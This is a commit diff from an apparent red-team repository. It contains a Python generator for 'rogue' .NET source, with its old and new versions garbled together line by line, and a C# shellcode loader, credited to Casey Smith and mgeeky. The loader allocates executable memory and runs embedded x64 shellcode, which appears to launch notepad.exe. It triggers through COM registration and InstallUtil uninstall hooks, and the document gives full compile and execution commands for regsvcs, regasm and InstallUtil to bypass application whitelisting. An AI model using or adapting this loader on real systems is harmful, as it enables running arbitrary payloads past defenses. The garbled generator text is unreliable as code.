sys.stderr.write('[?] File recognized as PE/EXE.\n\n') sys.stderr.write('''
with open(args.inputFile, 'rb') as f: :: Rogue .NET Source Code Generation Utility
payload = f.read() To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
Mariusz B. / mgeeky, <mb@binary-offensive.com>
elif args.raw:
_format = 'raw' ''')
sys.stderr.write('[?] File specified as raw Shellcode.\n\n') if len(argv) < 2:
with open(args.inputFile, 'rb') as f: print('Usage: ./generateRogueDotNet.py <inputFile>')
payload = f.read() sys.exit(-1)
else: args = opts(argv)
sys.stderr.write('[?] Powershell code given.\n')
sys.stderr.write('[?] WARNING: You need to have System.Management.Automation assemblies preinstalled.\n') _format = 'powershell'
sys.stderr.write(' Obtain them from: .\n\n')
if args.exe:
if args.inputFile.endswith('.exe'): if not detectFileIsExe(args.inputFile, args.exe):
return False sys.stderr.write('[-] File not recognized as PE/EXE.\n\n')
return False
payload = getCompressedPayload(args.inputFile)
_format = 'exe'
output = getSourceFileContents(payload, _format) sys.stderr.write('[+] File recognized as PE/EXE.\n\n')
with open(args.inputFile, 'rb') as f:
print(output) payload = f.read()
management = '' elif args.raw:
if _format == 'powershell': _format = 'raw'
management = ' /r:System.Management.Automation.dll' sys.stderr.write('[+] File specified as raw Shellcode.\n\n')
with open(args.inputFile, 'rb') as f:
commands = ''' payload = f.read()
===================================== else:
sys.stderr.write('[+] Powershell code given.\n')
Step 1: Create Your Strong Name Key -> key.snk
if args.inputFile.endswith('.exe'):
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4=' return False
$Content = [System.Convert]::FromBase64String($key)
Set-Content key.snk -Value $Content -Encoding Byte payload = getCompressedPayload(args.inputFile)
Step 2: Compile source code: output = getSourceFileContents(payload, _format)
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll{} /target:library /out:regsvcs.dll /keyfile:key.snk program.cs
print(output)
Step 3: Execute your payload!
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe regsvcs.dll management = ''
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe regsvcs.dll if _format == 'powershell':
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U regsvcs.dll management = ' /r:System.Management.Automation.dll'
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U regsvcs.dll
'''.format(management) commands = '''
if 'PROGRAMFILES(X86)' in os.environ: =====================================
commands = commands.replace('Framework', 'Framework64')
Step 1: Create Your Strong Name Key -> key.snk
sys.stderr.write(commands)
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
if __name__ == '__main__': $Content = [System.Convert]::FromBase64String($key)
main(sys.argv) Set-Content key.snk -Value $Content -Encoding Byte
Step 2: Compile source code:
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll{} /target:library /out:rogue.dll /keyfile:key.snk program.cs
Step 3: Execute your payload!
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe rogue.dll
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U rogue.dll
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe rogue.dll
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U rogue.dll
%WINDIR%\\Microsoft.NET\\Framework64\\v2.0.50727\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
%WINDIR%\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
'''.format(management)
if 'PROGRAMFILES(X86)' in os.environ:
commands = commands.replace('Framework', 'Framework64')
sys.stderr.write(commands)
if __name__ == '__main__':
main(sys.argv)

Binary file not shown.

View File

@ -0,0 +1,141 @@
using System;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
using System.EnterpriseServices;
/*
Author: Casey Smith, Twitter: @subTee
Customized by: Mariusz B. / mgeeky, <mb@binary-offensive.com>
License: BSD 3-Clause
Step 1: Create Your Strong Name Key -> key.snk
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
$Content = [System.Convert]::FromBase64String($key)
Set-Content key.snk -Value $Content -Encoding Byte
Step 2: Compile source code:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs
Step 3: Execute your payload!
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll
*/
namespace Program
{
public class Bypass : ServicedComponent
{
public Bypass()
{
}
// This executes if registration is successful
[ComRegisterFunction]
public static void RegisterClass( string key )
{
Shellcode.Execute();
}
// This executes if registration fails
[ComUnregisterFunction]
public static void UnRegisterClass( string key )
{
Shellcode.Execute();
}
}
[System.ComponentModel.RunInstaller(true)]
public class ForInstallUtil : System.Configuration.Install.Installer
{
// This executes during InstallUtil /U invocation
public override void Uninstall(System.Collections.IDictionary savedState)
{
Shellcode.Execute();
}
}
public class Shellcode
{
[DllImport("kernel32")]
private static extern IntPtr VirtualAlloc(
IntPtr lpAddress, UIntPtr dwSize,
UInt32 flAllocationType,
UInt32 flProtect
);
[DllImport("kernel32")]
private static extern bool VirtualFree(
IntPtr lpAddress,
UInt32 dwSize,
UInt32 dwFreeType
);
[DllImport("kernel32")]
private static extern IntPtr CreateThread(
UInt32 lpThreadAttributes,
UInt32 dwStackSize,
IntPtr lpStartAddress,
IntPtr param,
UInt32 dwCreationFlags,
ref UInt32 lpThreadId
);
[DllImport("kernel32")]
private static extern bool CloseHandle(
IntPtr hHandle
);
[DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(
IntPtr hHandle,
UInt32 dwMilliseconds
);
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
private static UInt32 MEM_RELEASE = 0x8000;
public static void Execute() {
byte[] payload = new byte[279] {
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51,
0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52,
0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0xe2, 0xed,
0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48, 0x01, 0xd0, 0x8b, 0x80, 0x88,
0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44,
0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48,
0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1,
0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44,
0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49,
0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a,
0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41,
0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48, 0xba, 0x01, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b,
0x6f, 0x87, 0xff, 0xd5, 0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff,
0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb, 0x47,
0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x6e, 0x6f, 0x74, 0x65, 0x70,
0x61, 0x64, 0x2e, 0x65, 0x78, 0x65, 0x00
};
IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Marshal.Copy(payload, 0, funcAddr, payload.Length);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
hThread = CreateThread(0, 0, funcAddr, IntPtr.Zero, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF);
CloseHandle(hThread);
VirtualFree(funcAddr, 0, MEM_RELEASE);
}
}
}

Binary file not shown.